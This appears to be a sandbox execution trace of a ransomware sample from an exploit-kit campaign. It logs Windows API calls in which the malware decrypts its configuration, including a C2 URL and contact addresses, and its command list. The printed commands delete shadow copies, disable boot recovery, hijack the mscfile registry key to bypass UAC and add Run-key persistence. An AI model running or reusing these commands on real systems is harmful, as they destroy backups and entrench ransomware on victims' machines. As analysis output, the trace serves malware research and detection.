lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0092.066] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0092.066] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0092.066] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0092.066] LockResource (hResData=0x50d55c) returned 0x50d55c [0092.066] FreeResource (hResData=0x50d55c) returned 0 [0092.066] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.066] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.066] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.066] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.067] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.067] FreeResource (hResData=0x50d64c) returned 0 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0092.067] GetCurrentThreadId () returned 0xa8c [0092.068] GetCurrentThreadId () returned 0xa8c [0092.068] GetCurrentThreadId () returned 0xa8c [0092.068] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0092.068] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0092.068] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0092.068] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0092.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0092.072] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0092.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0092.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0092.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0092.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0092.079] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0092.211] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0092.211] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0092.212] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0092.212] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0092.212] GetTickCount () returned 0x22654 [0092.212] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbc0 | out: lpPerformanceCount=0x12fbc0*=14900082894) returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x76\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x66\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x43\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x43\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x65\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x52\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x59\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x6b\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x76\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x51\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x79\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] CreateDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy"), lpSecurityAttributes=0x0) returned 1 [0092.213] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0092.213] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0092.213] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0092.213] LockResource (hResData=0x50d72c) returned 0x50d72c [0092.213] FreeResource (hResData=0x50d72c) returned 0 [0092.213] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.213] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.213] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.213] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.213] FreeResource (hResData=0x50d64c) returned 0 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.213] GetCurrentThreadId () returned 0xa8c [0092.213] GetCurrentThreadId () returned 0xa8c [0092.213] GetCurrentThreadId () returned 0xa8c [0092.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0092.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=1410, lpWideCharStr=0x13ac63c, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0092.214] GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThread () returned 0xfffffffe [0092.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0092.214] GetLastError () returned 0x3f0 [0092.214] GetCurrentProcess () returned 0xffffffff [0092.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0092.214] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13aa620, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13aa620, ReturnLength=0x12fc60) returned 1 [0092.214] CloseHandle (hObject=0xb8) returned 1 [0092.215] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa684*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa6a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa6ac*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0092.215] GetCurrentProcess () returned 0xffffffff [0092.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0092.215] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0092.215] GetLastError () returned 0x7a [0092.215] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x3076a0 [0092.215] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x3076a0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x3076a0, ReturnLength=0x12fc64) returned 1 [0092.215] GetSidSubAuthorityCount (pSid=0x3076a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x3076a9 [0092.215] GetSidSubAuthority (pSid=0x3076a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x3076b0 [0092.215] LocalFree (hMem=0x3076a0) returned 0x0 [0092.215] CloseHandle (hObject=0xb8) returned 1 [0092.215] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0092.215] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0092.215] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0092.215] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.218] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0092.218] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0092.218] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0092.218] LockResource (hResData=0x516824) returned 0x516824 [0092.218] FreeResource (hResData=0x516824) returned 0 [0092.218] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.218] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.218] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.218] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.218] FreeResource (hResData=0x50d64c) returned 0 [0092.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.218] GetCurrentThreadId () returned 0xa8c [0092.218] GetCurrentThreadId () returned 0xa8c [0092.218] GetCurrentThreadId () returned 0xa8c [0092.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0092.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=615, lpWideCharStr=0x135ae4c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 